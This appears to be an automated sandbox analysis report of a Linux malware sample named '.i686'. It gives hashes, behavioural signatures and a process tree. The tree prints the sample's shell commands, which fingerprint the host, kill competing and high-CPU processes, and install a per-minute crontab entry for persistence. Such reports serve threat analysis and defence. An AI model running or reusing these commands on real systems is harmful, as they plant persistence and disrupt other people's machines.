Analysis

  • max time kernel
    149s
  • max time network
    134s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    08-11-2024 11:36

General

  • Target

    .update/.i686

  • Size

    1.4MB

  • MD5

    0418fda2bb712a2a2dfe38bbbd9e6390

  • SHA1

    3a7db599e916e40ae844e4998b665bad5307154d

  • SHA256

    05bfc9c56ad09d2b15a43f7887087d4f601016c0d81a822f42fc23ca70fbbf33

  • SHA512

    d40c63ec0d5e60db266c9223a02d5b2d97787cca481c9f56beddcd3ffe3022badd8ff6e4fa25a73d56be06f99cc6555031af185f88017a74bcd050ac5be33401

  • SSDEEP

    24576:bZ9yQjOF5thg8/LRLgP+kMzdroSXcRb+34YlCB0V4XLNw3QgRHpV8RDHkSrWgfqH:lNC5tOcRL4M4Rbo4YibwggRM1rCjPF

Malware Config

Signatures

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Security Software Discovery 1 TTPs 2 IoCs

    Adversaries may attempt to discover installed security software and its configurations.

  • Checks CPU configuration 1 TTPs 3 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 7 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 60 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.update/.i686
    /tmp/.update/.i686
    1⤵
    • Checks hardware identifiers (DMI)
    • Reads hardware information
    • Checks CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:1398
    • /bin/sh
      sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      2⤵
        PID:1399
        • /usr/bin/hostname
          hostname -I
          3⤵
            PID:1402
          • /usr/bin/awk
            awk "{print \$1}"
            3⤵
              PID:1404
            • /usr/bin/awk
              awk "{print \"-\"\$2}"
              3⤵
                PID:1409
              • /usr/bin/head
                head -n 1
                3⤵
                  PID:1408
                • /usr/bin/grep
                  grep "Port "
                  3⤵
                    PID:1407
                  • /usr/bin/cat
                    cat /etc/ssh/sshd_config
                    3⤵
                      PID:1406
                    • /usr/bin/whoami
                      whoami
                      3⤵
                        PID:1410
                      • /usr/bin/hostname
                        hostname
                        3⤵
                          PID:1411
                        • /usr/bin/grep
                          grep -c "^processor" /proc/cpuinfo
                          3⤵
                          • Checks CPU configuration
                          PID:1412
                        • /usr/bin/sed
                          sed -e "s/\$//"
                          3⤵
                            PID:1418
                          • /usr/bin/sed
                            sed -e "s/^ *//"
                            3⤵
                              PID:1417
                            • /usr/bin/cut
                              cut -d: -f2
                              3⤵
                                PID:1416
                              • /usr/bin/grep
                                grep -m 1 "model name" /proc/cpuinfo
                                3⤵
                                • Checks CPU configuration
                                PID:1415
                              • /usr/bin/awk
                                awk "{print \$1}"
                                3⤵
                                  PID:1421
                                • /usr/bin/awk
                                  awk "{print \$4}"
                                  3⤵
                                    PID:1424
                                  • /usr/bin/awk
                                    awk "{print \$4}"
                                    3⤵
                                      PID:1427
                                  • /bin/sh
                                    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                    2⤵
                                      PID:1428
                                      • /usr/bin/awk
                                        awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                        3⤵
                                          PID:1430
                                        • /usr/bin/ps
                                          ps -A "-ostat,ppid"
                                          3⤵
                                          • Reads CPU attributes
                                          • Reads runtime system information
                                          PID:1429
                                        • /usr/bin/id
                                          id -u
                                          3⤵
                                            PID:1432
                                          • /usr/bin/grep
                                            grep -v grep
                                            3⤵
                                              PID:1438
                                            • /usr/bin/grep
                                              grep /etc/cron
                                              3⤵
                                                PID:1437
                                              • /usr/bin/ps
                                                ps x
                                                3⤵
                                                • Reads CPU attributes
                                                • Reads runtime system information
                                                PID:1436
                                            • /bin/sh
                                              sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                              2⤵
                                              • Security Software Discovery
                                              PID:1440
                                              • /usr/bin/id
                                                id -u
                                                3⤵
                                                  PID:1441
                                                • /usr/bin/awk
                                                  awk "{if(\$3>30.0) print \$2}"
                                                  3⤵
                                                    PID:1446
                                                  • /usr/bin/grep
                                                    grep -v /usr/sbin/httpd
                                                    3⤵
                                                      PID:1445
                                                    • /usr/bin/grep
                                                      grep -v -- "-bash[[:space:]]*\$"
                                                      3⤵
                                                        PID:1444
                                                      • /usr/bin/grep
                                                        grep -v grep
                                                        3⤵
                                                          PID:1443
                                                        • /usr/bin/ps
                                                          ps aux
                                                          3⤵
                                                          • Reads CPU attributes
                                                          • Process Discovery
                                                          • Reads runtime system information
                                                          PID:1442
                                                      • /bin/sh
                                                        sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
                                                        2⤵
                                                        • Writes file to tmp directory
                                                        PID:1448
                                                        • /usr/bin/rm
                                                          rm -rf /tmp/.update/.cron
                                                          3⤵
                                                            PID:1450
                                                          • /usr/bin/grep
                                                            grep -v grep
                                                            3⤵
                                                              PID:1452
                                                            • /usr/bin/crontab
                                                              crontab -l
                                                              3⤵
                                                                PID:1451
                                                              • /usr/bin/grep
                                                                grep -v /tmp/.update/.i686
                                                                3⤵
                                                                  PID:1453
                                                                • /usr/bin/grep
                                                                  grep "/tmp/.update/.i686\$"
                                                                  3⤵
                                                                    PID:1457
                                                                  • /usr/bin/grep
                                                                    grep -v grep
                                                                    3⤵
                                                                      PID:1456
                                                                    • /usr/bin/uniq
                                                                      uniq
                                                                      3⤵
                                                                        PID:1459
                                                                      • /usr/bin/crontab
                                                                        crontab -l
                                                                        3⤵
                                                                          PID:1455
                                                                        • /usr/bin/wc
                                                                          wc -l
                                                                          3⤵
                                                                            PID:1460
                                                                          • /usr/bin/sort
                                                                            sort
                                                                            3⤵
                                                                              PID:1458
                                                                            • /usr/bin/crontab
                                                                              crontab /tmp/.update/.cron
                                                                              3⤵
                                                                              • Creates/modifies Cron job
                                                                              PID:1461
                                                                            • /usr/bin/rm
                                                                              rm -rf /tmp/.update/.cron
                                                                              3⤵
                                                                                PID:1462
                                                                            • /bin/sh
                                                                              sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                                                              2⤵
                                                                              • Security Software Discovery
                                                                              PID:1463
                                                                              • /usr/bin/id
                                                                                id -u
                                                                                3⤵
                                                                                  PID:1464
                                                                                • /usr/bin/wc
                                                                                  wc -l
                                                                                  3⤵
                                                                                    PID:1470
                                                                                  • /usr/bin/awk
                                                                                    awk "{if(\$3>30.0) print \$2}"
                                                                                    3⤵
                                                                                      PID:1469
                                                                                    • /usr/bin/grep
                                                                                      grep -- "-bash[[:space:]]*\$"
                                                                                      3⤵
                                                                                        PID:1468
                                                                                      • /usr/bin/grep
                                                                                        grep -v grep
                                                                                        3⤵
                                                                                          PID:1467
                                                                                        • /usr/bin/ps
                                                                                          ps aux
                                                                                          3⤵
                                                                                          • Reads CPU attributes
                                                                                          • Process Discovery
                                                                                          • Reads runtime system information
                                                                                          PID:1466

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • /tmp/.update/.cron

                                                                                      Filesize

                                                                                      42B

                                                                                      MD5

                                                                                      9814e9c19a7304358742e3553bd73ea7

                                                                                      SHA1

                                                                                      88d43c112af907d972b1f1e2f49632f8ca004864

                                                                                      SHA256

                                                                                      9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d

                                                                                      SHA512

                                                                                      eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f

                                                                                    • /var/spool/cron/crontabs/tmp.6m5OSD

                                                                                      Filesize

                                                                                      234B

                                                                                      MD5

                                                                                      964b07829b4f71b67d83a0ac24db1cab

                                                                                      SHA1

                                                                                      bf052205fa7870a5b2ebb4141a4bb604ccecf435

                                                                                      SHA256

                                                                                      af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b

                                                                                      SHA512

                                                                                      d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b